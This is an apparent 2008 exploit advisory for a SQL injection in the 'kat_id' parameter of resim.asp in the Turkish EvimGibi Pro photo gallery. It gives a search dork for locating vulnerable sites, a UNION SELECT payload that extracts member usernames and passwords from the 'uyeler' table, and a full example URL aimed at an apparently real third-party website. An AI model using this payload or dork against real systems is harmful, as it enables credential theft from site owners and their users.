EvimGibi Pro Resim Galerisi v1.0 (tr) 

resim.asp (kat_id) Remote Sql inj.

download: http://www.aspindir.com/indir.asp?id=4868&sIslem=Ýndir

dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 

dork: intext:"Asp Programlama : EvimGibi"

author: ZoRLu

home: z0rlu.blogspot.com 

concat: trt-turk@hotmail.com

date: 28/10/2008

n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA  : ( (

n0te: a.q kpss : ) )


exploit:

http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]

[SQL]=

-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

example:

http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler